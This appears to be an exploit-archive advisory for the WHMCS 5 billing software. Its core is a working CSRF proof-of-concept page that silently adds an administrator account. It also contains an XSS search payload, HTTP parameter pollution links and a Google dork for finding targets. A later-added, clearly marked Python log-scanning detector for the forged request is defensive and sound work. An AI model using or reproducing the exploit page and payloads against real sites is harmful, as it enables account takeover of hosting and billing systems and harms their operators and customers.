WHMCS 5 Cross Site Request Forgery / Cross Site Scripting

Posted May 30, 2012
Authored by Shadman Tanjim

WHMCS version 5 suffers from cross site request forgery, HTTP parameter pollution, and cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss, csrf
MD5 | 2872ea8a1a3ad234439140a1fa613b38

##########################################################################################################################
# Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
# Version: Latest version 5.1; other previous versions may be vulnerable
# Vendor: www.whmcs.com
# Date: 2012-05-30
# Tested on: win/linux
# Author/Found by: Shadman Tanjim
# Email: shadman2600@gmail.com
# Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
# Special Thanks: x8631p
# Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS
############################################################################################################################

CSRF Vulnerability:

Get:
http://site.com/clientarea.php
http://site.com/admin/index.php
http://site.com/admin/login.php

Post:
http://site.com/admin/login.php
http://site.com/cart.php
http://site.com/admin/configadmins.php
http://site.com/pwreset.php


p0c:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<h2>WHMCS CSRF ExpL0iT PoC</h2>
</head>
<script language="javascript" type="text/javascript" >

function lifeissimple() {

var token = "Token Value";

var img = document.createElement("img");
var site="http://www.localhost.com:80";
var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token + "&roleid=1&firstname=dead&lastname=cow&email=deadcow@deadcow.com&username=deadcow&password=deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend&language=English";
img.setAttribute("src", requesturl);
document.body.appendChild(img);

var img2 = document.createElement("img");
img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&");
document.body.appendChild(img2);
}

</script>
<body onload="lifeissimple();">

</body>
</html>
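
Detection sketch for the request the PoC above generates, added here as an example and not part of the original advisory: it scans web server access logs (Combined Log Format assumed) for `configadmins.php?action=save` requests that arrive via GET, carry a foreign or missing Referer, or expose the password in the query string. The hostname `billing.example.test`, the function name `findings` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

SITE_HOST = "billing.example.test"        # assumption: hostname of the WHMCS install
ADMIN_SCRIPT = "/admin/configadmins.php"  # script targeted by the advisory's PoC
STATE_CHANGING = {"save"}                 # action value used in the PoC; extend as needed

def findings(line):
    """Return the reasons a log line looks like a forged admin-save request."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    query = parse_qs(url.query, keep_blank_values=True)
    actions = set(query.get("action", []))
    if not url.path.endswith(ADMIN_SCRIPT) or not STATE_CHANGING & actions:
        return []
    reasons = []
    if m["method"] == "GET":  # an <img> tag can only issue GET
        reasons.append("state-changing action sent via GET")
    ref_host = urlsplit(m["referer"]).hostname
    if m["referer"] in ("", "-"):
        reasons.append("no Referer")
    elif ref_host != SITE_HOST:
        reasons.append(f"cross-site Referer: {ref_host}")
    if {"password", "password2"} & query.keys():
        reasons.append("password in query string")
    return reasons

# Constructed sample log lines (not taken from a real system)
SAMPLE_LOG = [
    '203.0.113.7 - - [30/May/2012:10:01:02 +0000] "GET /billing/admin/configadmins.php?action=save&id=&token=abc&roleid=1&username=u1&password=x&password2=x HTTP/1.1" 200 512 "http://other.example.test/page.html" "Mozilla/5.0"',
    '203.0.113.7 - - [30/May/2012:10:05:00 +0000] "POST /billing/admin/configadmins.php?action=save HTTP/1.1" 302 0 "http://billing.example.test/billing/admin/configadmins.php" "Mozilla/5.0"',
    '203.0.113.7 - - [30/May/2012:10:06:00 +0000] "GET /billing/admin/configadmins.php HTTP/1.1" 200 9000 "http://billing.example.test/billing/admin/index.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(findings(line))
```
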


Cross-site Scripting (XSS) Vulnerability:

request: POST http://site.com/knowledgebase.php?action=search HTTP/1.1
Content-Type: application/x-www-form-urlencoded

search='%20onerror%3D'f(PSRyh)


HTTP Parameter Pollution:

1. Affected link: http://site.com/cart.php?a=add&domain=transfer&n913620=v992636
Affected parameter: a=add

2. Affected link: http://site.com/domainchecker.php?search=bulkregister&n946774=v992350
Affected parameter: search=bulkregister

3. Affected link: http://site.com/cart.php?currency=2&gid=1&n972751=v976696
Affected parameter: currency=2
